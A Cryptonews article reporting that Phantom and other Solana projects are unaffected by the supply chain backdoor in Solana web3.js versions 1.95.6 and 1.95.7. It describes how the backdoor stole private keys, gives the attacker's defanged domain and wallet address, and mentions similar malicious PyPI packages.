Phantom Safe from Solana Web3.js Bug; Upgrade to 1.95.8 Urged

Last updated:

Journalist

Hassan Shittu

Journalist

Hassan Shittu

About Author

Hassan, a Cryptonews.com journalist with 6+ years of experience in Web3 journalism, brings deep knowledge across Crypto, Web3 Gaming, NFTs, and Play-to-Earn sectors. His work has appeared in…

Last updated:

Why Trust Cryptonews

For over a decade, Cryptonews has covered the cryptocurrency industry, aiming to provide informative insights to our readers. Our journalists and analysts have extensive experience in market analysis and blockchain technologies. We strive to maintain high editorial standards, focusing on factual accuracy and balanced reporting across all areas – from cryptocurrencies and blockchain projects to industry events, products, and technological developments. Our ongoing presence in the industry reflects our commitment to delivering relevant information in the evolving world of digital assets. Read more about Cryptonews

Ad Disclosure

We believe in full transparency with our readers. Some of our content includes affiliate links, and we may earn a commission through these partnerships.

Phantom, a prominent wallet provider in the Solana ecosystem, has reassured its users that it is unaffected by a critical vulnerability recently discovered in the Solana/web3.js library.

The exploit, found in versions 1.95.6 and 1.95.7, involved malicious code designed to steal private keys. This flaw severely threatened applications and developers relying on the compromised versions, potentially exposing user funds to theft.

Phantom’s security team confirmed in a statement on X that the wallet provider has never used these versions in its infrastructure, ensuring its users remain safe.

The vulnerability has sent ripples through the Solana developer community.

Solana developer Trent Sol, who first sounded the alarm, described the compromised versions as a “secret stealer” capable of leaking private keys through seemingly legitimate CloudFlare headers.

He urged developers and projects to immediately upgrade to version 1.95.8 or roll back to unaffected version 1.95.5.

Despite these vulnerabilities, major projects such as Drift, Solflare, and Phantom confirmed their immunity, either due to avoiding the impacted versions or deploying additional security layers.

The Bug in Solana Web3.js Library: Who Is Affected?

According to a Socket.dev post, a supply chain attack compromised the Solana/web3.js library, a core component for developers building on Solana.

This type of attack, targeting dependencies widely used by developers, inserted a backdoor function named addToQueue into versions 1.95.6 and 1.95.7.

The malicious function enabled the exfiltration of private keys by disguising its activity as legitimate CloudFlare header data.

Once captured, these keys were transmitted to a hardcoded Solana wallet address identified as FnvLGtucz4E1ppJHRTev6Qv4X7g8Pw6WPStHCcbAKbfx.

Cybersecurity researchers, including Christophe Tafani-Dereeper from Datadog, analyzed the malicious versions and highlighted the sophisticated nature of the exploit.

They discovered that the domain used for the operation (sol-rpc[.]xyz) had been registered on November 22, just days before the attack became public.

The domain was hosted behind CloudFlare, with the command-and-control (C2) server now offline.

This timeline points to a carefully planned attack, likely due to a phishing or social engineering campaign targeting the library’s maintainers.

The npm package manager, which hosts Solana/web3.js, swiftly removed the compromised versions.

Developers using the affected versions were advised to update version 1.95.8 immediately or audit their projects for suspicious dependencies.

Broader Implications for Solana and Web3 Security

The Solana ecosystem has responded rapidly to mitigate the fallout.

In addition to Phantom, major projects like Backpack have assured their users that the exploit does not affect them.

Supply chain attacks like this have become increasingly common as malicious actors target the tools and libraries developers rely on.

Earlier this year, a similar attack involved a malicious Python package named “Solana-py,” which masqueraded as a legitimate API to steal wallet keys.

Similarly, in October this year, the Checkmarx threat research team uncovered a new malware campaign on the Python Package Index (PyPI) repository, targeting cryptocurrency users through a malicious package named “CryptoAITools.”

The malware masquerades itself as a legitimate cryptocurrency trading tool and uses a deceptive graphical user interface to distract victims while executing malicious activities on Windows and macOS systems.

Once installed, the malware launches a sophisticated multi-stage infection process, downloading additional components from a fake website and stealing sensitive data such as wallet recovery phrases, saved passwords, browsing history, and even Apple Notes on macOS.

Beyond the initial infection through PyPI, the campaign extends to other platforms, employing multiple social engineering tactics to lure victims.

You May Also Like